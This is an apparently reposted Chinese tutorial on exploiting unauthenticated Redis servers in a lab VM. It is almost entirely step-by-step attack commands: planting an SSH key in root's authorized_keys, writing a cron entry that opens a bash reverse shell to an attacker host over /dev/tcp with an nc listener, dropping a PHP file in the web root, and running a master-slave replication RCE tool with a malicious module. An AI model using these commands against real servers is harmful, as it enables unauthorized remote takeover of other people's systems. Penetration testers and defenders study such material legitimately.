一分钟可以看完的Redis漏洞攻击

Posted ChaBug

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了一分钟可以看完的Redis漏洞攻击相关的知识,希望对你有一定的参考价值。

  • 环境搭建

在虚拟机中搭建redis服务 

  • 测试连接

一分钟可以看完的Redis漏洞攻击

写ssh-keygen公钥登陆

  • 首先在本地生产公私钥文件

 
   
   
 
  1. ssh-keygen t rsa

一分钟可以看完的Redis漏洞攻击

  • 公钥写入 key.txt 文件

 
   
   
 
  1. (echo -e " "; cat id_rsa.pub; echo -e " ") > test.txt

一分钟可以看完的Redis漏洞攻击

  • 连接 Redis 写入文件

 
   
   
 
  1. cat test.txt | redis-cli -h 192.168.1.103 -x set crackit

  2. redis-cli -h 192.168.1.103

  3. config set dir /root/.ssh/

  4. config get dir

  5. config set dbfilename "authorized_keys"

  6. save

一分钟可以看完的Redis漏洞攻击

  • 私钥登陆

 
   
   
 
  1. ssh -i id_rsa root@192.168.1.103

一分钟可以看完的Redis漏洞攻击

利用计划任务执行命令反弹shell

  • 监听一个端口

 
   
   
 
  1. nc -lvvp 6666

一分钟可以看完的Redis漏洞攻击

  • 写入反弹shell

 
   
   
 
  1. set x " */1 * * * * /bin/bash -i >& /dev/tcp/192.168.1.101/6666 0>&1 "

  2. config set dir /var/spool/cron/

  3. config set dbfilename root

  4. save

一分钟可以看完的Redis漏洞攻击

  • 反弹shell

一分钟可以看完的Redis漏洞攻击

WEB目录写webshell

  • 写shell

 
   
   
 
  1. config set dir /var/www/html/

  2. config set dbfilename shell.php

  3. set x "<?php phpinfo();?>"

  4. save

一分钟可以看完的Redis漏洞攻击

一分钟可以看完的Redis漏洞攻击

基于主从复制的RCE

  • 影响范围

 
   
   
 
  1. Redis 4.x/5.x

 
   
   
 
  1. https://github.com/jas502n/Redis-RCE.git

  • 主从利用

 
   
   
 
  1. python redis-rce.py -r 192.168.1.103 -p 6379 -L 192.168.1.101 -f exp_lin.so

以上是关于一分钟可以看完的Redis漏洞攻击的主要内容,如果未能解决你的问题,请参考以下文章

服务器由于redis未授权漏洞被攻击

修补--Redis未授权访问漏洞

Redis利用漏洞

20165318 缓冲区溢出漏洞实验

威胁通告Redis主从同步代码执行漏洞预警通告

记录一次攻击事件(redis 未授权漏洞利用直接登录服务器)